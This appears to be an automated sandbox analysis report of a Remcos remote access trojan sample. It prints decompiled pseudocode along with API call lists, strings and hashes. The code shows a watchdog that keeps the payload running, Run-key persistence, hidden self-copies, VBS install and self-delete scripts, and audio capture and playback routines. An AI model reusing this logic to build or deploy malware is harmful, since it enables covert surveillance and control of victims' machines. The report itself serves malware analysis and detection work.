                    				_t31 = E00410A30(E00401F95(0x46c518), "exepath",  &_v556, 0x208, _t28, _t27);
                    				_t116 = _t115 + 0x14;
                    				if(_t31 != 0) {
                    					E004020D5(0,  &_v32);
                    					if(E004179DC( &_v556,  &_v32) == 0) {
                    						goto L1;
                    					}
                    					_t110 = OpenProcess(0x100000, 0, _v8);
                    					WaitForSingleObject(_t110, 0xffffffff);
                    					CloseHandle(_t110);
                    					_t37 = GetCurrentProcessId();
                    					if(E00410BB0(0x46c518, E00401F95(0x46c518), "WDH", _t37) == 0) {
                    						L18:
                    						_push(1);
                    						L2:
                    						ExitProcess();
                    					}
                    					_t108 = ShellExecuteW;
                    					do {
                    						_t41 = PathFileExistsW( &_v556);
                    						_t42 =  &_v556;
                    						if(_t41 != 0) {
                    							L11:
                    							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
                    							L12:
                    							do {
                    								_t72 = E00410885(E00401F95(0x46c518), "WD",  &_v8);
                    								_t122 = _t72;
                    								if(_t72 == 0) {
                    									Sleep(0x1f4);
                    								} else {
                    									E00410CE2(E00401F95(0x46c518), _t122, "WD");
                    								}
                    							} while (_t72 == 0);
                    							goto L17;
                    						}
                    						_t55 = E00402489();
                    						if(E00417947(E00401F95( &_v32), _t55,  &_v556, _t71) == 0) {
                    							E00431F00(_t108,  &_v1596, _t71, 0x208);
                    							_t116 = _t116 + 0xc;
                    							GetTempPathW(0x104,  &_v1596);
                    							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
                    							lstrcatW( &_v1076, L".exe");
                    							_t68 = E00402489();
                    							_t70 = E00417947(E00401F95( &_v32), _t68,  &_v1076, _t71);
                    							__eflags = _t70;
                    							if(_t70 == 0) {
                    								goto L12;
                    							}
                    							_t42 =  &_v1076;
                    							goto L11;
                    						}
                    						_t42 =  &_v556;
                    						goto L11;
                    						L17:
                    						_t71 = 0;
                    						_t112 = OpenProcess(0x100000, 0, _v8);
                    						WaitForSingleObject(_t112, 0xffffffff);
                    						CloseHandle(_t112);
                    						_t50 = GetCurrentProcessId();
                    					} while (E00410BB0(0x46c518, E00401F95(0x46c518), "WDH", _t50) != 0);
                    					goto L18;
                    				}
                    				L1:
                    				_push(_t71);
                    				goto L2;
                    			}

                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046C578,0046C518,00000000), ref: 0040FDAE
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FDC1
                      • Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                      • Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                      • Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                    • ExitProcess.KERNEL32 ref: 0040FE08
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FE31
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FE3C
                    • CloseHandle.KERNEL32(00000000), ref: 0040FE43
                    • GetCurrentProcessId.KERNEL32 ref: 0040FE49
                    • PathFileExistsW.SHLWAPI(?), ref: 0040FE7A
                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FF49
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FF9F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FFAA
                    • CloseHandle.KERNEL32(00000000), ref: 0040FFB1
                    • GetCurrentProcessId.KERNEL32 ref: 0040FFB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                    • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
                    • API String ID: 2645874385-232273909
                    • Opcode ID: a28846a215f10c602c3f8558ceab602c9d5a429de202bec3ef673ea7704a0fa4
                    • Instruction ID: 936eab12b9defa7a847bf0088e47ae9fd65786244bd6017a6c84ea0ad7cef012
                    • Opcode Fuzzy Hash: a28846a215f10c602c3f8558ceab602c9d5a429de202bec3ef673ea7704a0fa4
                    • Instruction Fuzzy Hash: 7E51D671A003066FDB10ABA0DC49EFE336D9B0475AF10407BF505A72E2EF789E49865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E004169CC(void* __ecx, void* __edx, char _a4) {
                    				char _v24;
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t25;
                    				void* _t28;
                    				void* _t43;
                    				void* _t60;
                    				void* _t63;
                    				void* _t67;
                    				CHAR* _t89;
                    				void* _t109;
                    				CHAR* _t110;
                    				void* _t111;
                    				void* _t114;
                    				void* _t118;
                    
                    				_t103 = __edx;
                    				_t67 = __ecx;
                    				_t109 = __edx;
                    				if(E00416C12( &_a4, __ecx, __ecx) == 0xffffffff) {
                    					_t63 = E00401EEB( &_a4);
                    					_t103 = 0x30;
                    					E00401EFA( &_a4, 0x30, _t111, E0041805B( &_v28, 0x30, _t63));
                    					E00401EF0();
                    				}
                    				_t25 = E00402489();
                    				_t120 = _t25;
                    				if(_t25 == 0) {
                    					__eflags = PathFileExistsW(E00401EEB( &_a4));
                    					if(__eflags != 0) {
                    						goto L4;
                    					} else {
                    						E00402084(_t67, _t114 - 0x18, 0x45f6bc);
                    						_push(0xa8);
                    						E00404AA4(_t67, 0x46ca18, _t103, __eflags);
                    					}
                    				} else {
                    					_t60 = E00401EEB( &_a4);
                    					_t118 = _t114 - 0x18;
                    					E004020EC(_t67, _t118, _t103, _t120, _t109);
                    					E00417A4E(_t60);
                    					_t114 = _t118 + 0x18;
                    					L4:
                    					_t28 = E004172DA( &_v124, _t67);
                    					_t108 = E00403030( &_v28, E004030A6(_t67,  &_v76, E00409E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                    					E004030A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                    					E00401EF0();
                    					E00401EF0();
                    					E00401EF0();
                    					E00401EF0();
                    					mciSendStringW(E00401EEB( &_v52), 0, 0, 0);
                    					mciSendStringA("play audio", 0, 0, 0);
                    					_t115 = _t114 - 0x18;
                    					E00402084(0, _t114 - 0x18, 0x45f6bc);
                    					_push(0xa9);
                    					E00404AA4(0, 0x46ca18, _t32, 0);
                    					_t43 = CreateEventA(0, 1, 0, 0);
                    					while(1) {
                    						L5:
                    						 *0x46bea8 = _t43;
                    						while(1) {
                    							_t122 = _t43;
                    							if(_t43 == 0) {
                    								break;
                    							}
                    							__eflags =  *0x46bea6; // 0x0
                    							if(__eflags != 0) {
                    								mciSendStringA("pause audio", 0, 0, 0);
                    								 *0x46bea6 = 0;
                    							}
                    							__eflags =  *0x46bea5; // 0x0
                    							if(__eflags != 0) {
                    								mciSendStringA("resume audio", 0, 0, 0);
                    								 *0x46bea5 = 0;
                    							}
                    							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                    							_t108 =  &_v24;
                    							_t110 = "stopped";
                    							_t89 = 0;
                    							while(1) {
                    								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
                    								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                    									break;
                    								}
                    								_t89 = _t89 + 1;
                    								__eflags = _t89 - 8;
                    								if(_t89 != 8) {
                    									continue;
                    								} else {
                    									SetEvent( *0x46bea8);
                    								}
                    								break;
                    							}
                    							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
                    							if(__eflags != 0) {
                    								_t43 =  *0x46bea8; // 0x0
                    							} else {
                    								CloseHandle( *0x46bea8);
                    								_t43 = 0;
                    								goto L5;
                    							}
                    						}
                    						mciSendStringA("stop audio", 0, 0, 0);
                    						mciSendStringA("close audio", 0, 0, 0);
                    						E00402084(0, _t115 - 0x18, 0x45f6bc);
                    						_push(0xaa);
                    						E00404AA4(0, 0x46ca18, _t108, _t122);
                    						E00401EF0();
                    						goto L21;
                    					}
                    				}
                    				L21:
                    				return E00401EF0();
                    			}

                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416AB1
                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416AC5
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 00416AEA
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 00416B00
                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00416B41
                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416B59
                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00416B6D
                    • SetEvent.KERNEL32 ref: 00416B8E
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 00416B9F
                    • CloseHandle.KERNEL32 ref: 00416BAF
                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416BD1
                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416BDB
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                    • API String ID: 738084811-1354618412
                    • Opcode ID: 4155854fe69e9a894aa6cca67176808cb6c1e0df87573e648ce2644fb1009e8c
                    • Instruction ID: 973dc57b0db8283a3ff3d0709b6d05c4eb7b4f2cac8df707c3dce394e9b06912
                    • Opcode Fuzzy Hash: 4155854fe69e9a894aa6cca67176808cb6c1e0df87573e648ce2644fb1009e8c
                    • Instruction Fuzzy Hash: 755180716001086FD704BBB5DC92DFF3A6DDA41389B10413FF902A61E2EF799D8586AE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040AD84() {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				short _v668;
                    				void* _t49;
                    				void* _t50;
                    				void* _t53;
                    				void* _t56;
                    				void* _t82;
                    				void* _t84;
                    				void* _t85;
                    				signed char _t123;
                    				signed char _t124;
                    				void* _t227;
                    				void* _t229;
                    				void* _t230;
                    				void* _t231;
                    
                    				E0041015B();
                    				if( *0x46a9d4 != 0x30) {
                    					E00409D73();
                    				}
                    				_t227 =  *0x46bd6b - 1; // 0x0
                    				if(_t227 == 0) {
                    					E0041537E(_t227);
                    				}
                    				if( *0x46ba75 != 0) {
                    					E00417754(E00401EEB(0x46c0e0));
                    				}
                    				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                    				_t229 =  *0x46bb02 - 1; // 0x1
                    				if(_t229 == 0) {
                    					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EEB(0x46c4e8));
                    				}
                    				_t230 =  *0x46bafb - 1; // 0x0
                    				if(_t230 == 0) {
                    					E00410D5C(0x80000002, _t214, E00401EEB(0x46c4e8));
                    				}
                    				_t231 =  *0x46bb00 - 1; // 0x0
                    				if(_t231 == 0) {
                    					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EEB(0x46c4e8));
                    				}
                    				E00431F00(0,  &_v668, 0, 0x208);
                    				_t49 = E00402489();
                    				_t50 = E00401F95(0x46c560);
                    				_t53 = E00410A30(E00401F95(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
                    				_t232 = _t53;
                    				if(_t53 == 0) {
                    					GetModuleFileNameW(0,  &_v668, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E00401F95(0x46c518));
                    				_t56 = E004074E4(_t232);
                    				_t233 = _t56;
                    				if(_t56 != 0) {
                    					SetFileAttributesW(E00401EEB(0x46c530), 0x80);
                    				}
                    				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
                    				asm("sbb bl, bl");
                    				E004030A6(_t123,  &_v148, E004172DA( &_v76, E00417093( &_v28)), 0, _t233, L".vbs");
                    				E00401EF0();
                    				E00401FC7();
                    				E00404429(_t123,  &_v124, E004030A6(_t123,  &_v28, E0040427F(_t123,  &_v76, E0043987F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
                    				E00401EF0();
                    				E00401EF0();
                    				E00404405(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040427F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                    				E00401EF0();
                    				_t124 = _t123 & 0x00000001;
                    				_t234 = _t124;
                    				if(_t124 != 0) {
                    					E00403311(E004030A6(_t124,  &_v28, E00404405(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040427F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
                    					E00401EF0();
                    					E00401EF0();
                    					E00401EF0();
                    				}
                    				E00403311(E004030A6(_t124,  &_v100, E004030A6(_t124,  &_v28, E0040427F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				_t235 = _t124;
                    				if(_t124 != 0) {
                    					E0040766C(_t124,  &_v52, 0, L"wend\n");
                    				}
                    				_t82 = E004074E4(_t235);
                    				_t236 = _t82;
                    				if(_t82 != 0) {
                    					E00403311(E004030A6(0x45f724,  &_v100, E00409E69( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
                    					E00401EF0();
                    					E00401EF0();
                    				}
                    				E0040766C(0x45f724,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                    				_t84 = E00401EEB( &_v124);
                    				_t85 = E00402489();
                    				if(E00417947(E00401EEB( &_v52), _t85 + _t85, _t84, 0) != 0) {
                    					ShellExecuteW(0, L"open", E00401EEB( &_v124), 0x45f724, 0x45f724, 0);
                    				}
                    				ExitProcess(0);
                    			}

                    APIs
                      • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                      • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AE8E
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AEA1
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AECF
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AEDD
                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                      • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B0D4
                    • ExitProcess.KERNEL32 ref: 0040B0DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    • API String ID: 3659626935-3677834288
                    • Opcode ID: 792134fd87e98148c8d854e5586bd324178bcfd0ed59dee402beeba099fd1f71
                    • Instruction ID: 1589e96350d2b26083133e670dfbb90ce18de44782133b39b347ac2ed663d9b9
                    • Opcode Fuzzy Hash: 792134fd87e98148c8d854e5586bd324178bcfd0ed59dee402beeba099fd1f71
                    • Instruction Fuzzy Hash: D1816D71A102145ACB15FBA1DCA69EF776A9F50704F10003FB806771E2EE7C5E8A869D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00401A64(WCHAR* __ecx, signed int __edx) {
                    				long _v8;
                    				void _v12;
                    				void _v16;
                    				void _v20;
                    				void _v24;
                    				void _v28;
                    				void _v32;
                    				signed int _t36;
                    				void** _t75;
                    				signed int _t80;
                    				void* _t81;
                    				signed int _t83;
                    
                    				_t75 = __edx;
                    				_t80 =  *0x46ba9a & 0x0000ffff;
                    				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
                    				_v20 = 1;
                    				_v16 = 0x10;
                    				_v24 = _t83 *  *0x46ba9c >> 3;
                    				asm("cdq");
                    				_v28 = _t83 + (__edx & 0x00000007) >> 3;
                    				_t36 =  *(__edx + 4) * _t80;
                    				_v32 = _t36;
                    				_v12 = _t36 + 0x24;
                    				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                    				if(_t81 != 0xffffffff) {
                    					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
                    					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
                    					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
                    					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
                    					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
                    					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
                    					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
                    					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
                    					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
                    					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
                    					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
                    					WriteFile(_t81, "data", 4,  &_v8, 0);
                    					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
                    					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
                    					CloseHandle(_t81);
                    					return 1;
                    				}
                    				return 0;
                    			}

                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ACC
                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF3
                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
                    • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B12
                    • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B22
                    • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B31
                    • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
                    • WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B50
                    • WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B60
                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6F
                    • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
                    • WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8E
                    • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B9E
                    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401BAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$Write$Create
                    • String ID: RIFF$WAVE$data$fmt
                    • API String ID: 1602526932-4212202414
                    • Opcode ID: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
                    • Instruction ID: 7cb0b37bd81af4d905286dd476bd08579b6e0b57ecfaa18f48c35616be89f383
                    • Opcode Fuzzy Hash: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
                    • Instruction Fuzzy Hash: DE413DB1A50218BAE710DA918C86FFFBBBCDB45B50F500066FB04EA0C0D7B45A05DBA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0040A987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
                    				char _v9;
                    				int _v20;
                    				char _v44;
                    				char _v68;
                    				char _v92;
                    				char _v116;
                    				char _v140;
                    				char _v164;
                    				char _v188;
                    				char _v212;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr _t62;
                    				void* _t63;
                    				signed int _t67;
                    				signed int _t68;
                    				int _t70;
                    				void* _t79;
                    				void* _t91;
                    				void* _t92;
                    				int _t94;
                    				void* _t99;
                    				void* _t100;
                    				WCHAR* _t113;
                    				int _t115;
                    				intOrPtr _t118;
                    				WCHAR* _t123;
                    				int _t124;
                    				void* _t139;
                    				intOrPtr* _t152;
                    				int _t153;
                    				intOrPtr* _t207;
                    				int _t208;
                    				intOrPtr* _t235;
                    				void* _t236;
                    				void* _t239;
                    				void* _t249;
                    				void* _t250;
                    				intOrPtr _t254;
                    				void* _t257;
                    				void* _t259;
                    				intOrPtr* _t260;
                    
                    				_t235 = __edx;
                    				_v9 = __ecx;
                    				_t260 = __edx;
                    				_v20 = 0;
                    				_t257 = __edx + 2;
                    				do {
                    					_t62 =  *_t235;
                    					_t235 = _t235 + 2;
                    				} while (_t62 != 0);
                    				_t236 = _t235 - _t257;
                    				_t268 = _t236;
                    				if(_t236 == 0) {
                    					_t143 = _a4;
                    					_t238 = __ecx;
                    					_t63 = E0041805B( &_v92, __ecx, _t143);
                    					_t259 = 0x46c500;
                    					E00401EFA(0x46c500, _t238, _t260, _t63);
                    				} else {
                    					CreateDirectoryW(E00401EEB(0x46c530), 0);
                    					_t143 = _a4;
                    					_t139 = E004030A6(_t143,  &_v92, E00407514( &_v44, 0x46c530, _t268, "\\"), 0x46c530, _t268, _t143);
                    					_t259 = 0x46c500;
                    					E00401EFA(0x46c500, _t138, _t260, _t139);
                    					E00401EF0();
                    				}
                    				E00401EF0();
                    				_t152 = E00401EEB(_t259);
                    				_t67 = 0x46bb08;
                    				while(1) {
                    					_t239 =  *_t67;
                    					if(_t239 !=  *_t152) {
                    						break;
                    					}
                    					if(_t239 == 0) {
                    						L10:
                    						_t153 = 0;
                    						_t68 = 0;
                    						L12:
                    						if(_t68 != 0) {
                    							_t70 = CopyFileW("C:\Windows\SysWOW64\DpiScaling.exe", E00401EEB(_t259), _t153);
                    							__eflags = _t70;
                    							if(_t70 != 0) {
                    								L23:
                    								E0040A896(0x46c4e8, E00401EEB(0x46c4e8));
                    								__eflags = _a8 - 1;
                    								_pop(_t157);
                    								if(__eflags != 0) {
                    									L28:
                    									E004030A6(_t143,  &_v92, E0040427F(_t143,  &_v68, E0043987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
                    									E00401EF0();
                    									E0040427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
                    									E0040766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                    									__eflags = _a12 - 1;
                    									_t144 = "\n";
                    									if(__eflags == 0) {
                    										_t100 = E0040427F("\n",  &_v212, "C:\Windows\SysWOW64\DpiScaling.exe");
                    										E00403311(E004030A6(_t144,  &_v68, E004030A6(_t144,  &_v116, E00403030( &_v140, E004030A6(_t144,  &_v164, E0040427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
                    										E00401EF0();
                    										E00401EF0();
                    										E00401EF0();
                    										E00401EF0();
                    										E00401EF0();
                    										E00401EF0();
                    									}
                    									_t79 = E0040427F(_t144,  &_v116, L"\"\"\", 0");
                    									E00403311(E004030A6(_t144,  &_v212, E00403030( &_v188, E00404429(_t144,  &_v164, E0040427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E00401EF0();
                    									E0040766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
                    									_t91 = E00401EEB( &_v92);
                    									_t92 = E00402489();
                    									_t94 = E00417947(E00401EEB( &_v44), _t92 + _t92, _t91, 0);
                    									__eflags = _t94;
                    									if(_t94 == 0) {
                    										L33:
                    										E00401EF0();
                    										return E00401EF0();
                    									} else {
                    										_t99 = ShellExecuteW(0, L"open", E00401EEB( &_v92), 0x45f724, 0x45f724, 0);
                    										__eflags = _t99 - 0x20;
                    										if(_t99 <= 0x20) {
                    											goto L33;
                    										}
                    										ExitProcess(0);
                    									}
                    								}
                    								_t113 = E00401EEB(_t259);
                    								_t143 = SetFileAttributesW;
                    								SetFileAttributesW(_t113, 7);
                    								_t249 = _t260 + 2;
                    								_t157 = 0;
                    								__eflags = 0;
                    								do {
                    									_t115 =  *_t260;
                    									_t260 = _t260 + 2;
                    									__eflags = _t115;
                    								} while (_t115 != 0);
                    								__eflags = _t260 - _t249;
                    								if(__eflags != 0) {
                    									_t157 = 0x46c530;
                    									SetFileAttributesW(E00401EEB(0x46c530), 7);
                    								}
                    								goto L28;
                    							}
                    							__eflags = _v9 - 0x36;
                    							if(_v9 == 0x36) {
                    								goto L23;
                    							}
                    							_t207 = _t260;
                    							_t250 = _t207 + 2;
                    							do {
                    								_t118 =  *_t207;
                    								_t207 = _t207 + 2;
                    								__eflags = _t118 - _v20;
                    							} while (_t118 != _v20);
                    							_t208 = _t207 - _t250;
                    							__eflags = _t208;
                    							_push(_t143);
                    							if(_t208 == 0) {
                    								E00401EFA(_t259, 0x36, _t260, E0041805B( &_v68, 0x36));
                    							} else {
                    								E00401EFA(_t259, _t128, _t260, E004030A6(_t143,  &_v140, E004030A6(_t143,  &_v116, E0041805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
                    								E00401EF0();
                    								E00401EF0();
                    							}
                    							E00401EF0();
                    							_t123 = E00401EEB(_t259);
                    							_t143 = 0x46bb08;
                    							_t124 = CopyFileW(0x46bb08, _t123, 0);
                    							__eflags = _t124;
                    							if(_t124 != 0) {
                    								goto L23;
                    							} else {
                    								E00409DC9(0x46bb08, _t259, 0x46bb08);
                    								return 0;
                    							}
                    						}
                    						E0040A896(0x46c4e8, E00401EEB(0x46c4e8));
                    						return 1;
                    					}
                    					_t254 =  *((intOrPtr*)(_t67 + 2));
                    					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
                    						break;
                    					}
                    					_t67 = _t67 + 4;
                    					_t152 = _t152 + 4;
                    					if(_t254 != 0) {
                    						continue;
                    					}
                    					goto L10;
                    				}
                    				asm("sbb eax, eax");
                    				_t68 = _t67 | 0x00000001;
                    				_t153 = 0;
                    				__eflags = 0;
                    				goto L12;
                    			}

                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A9BF
                    • CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 0040AA8B
                    • CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 0040AB29
                      • Part of subcall function 0041805B: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB6B
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB90
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040AD5B
                    • ExitProcess.KERNEL32 ref: 0040AD67
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
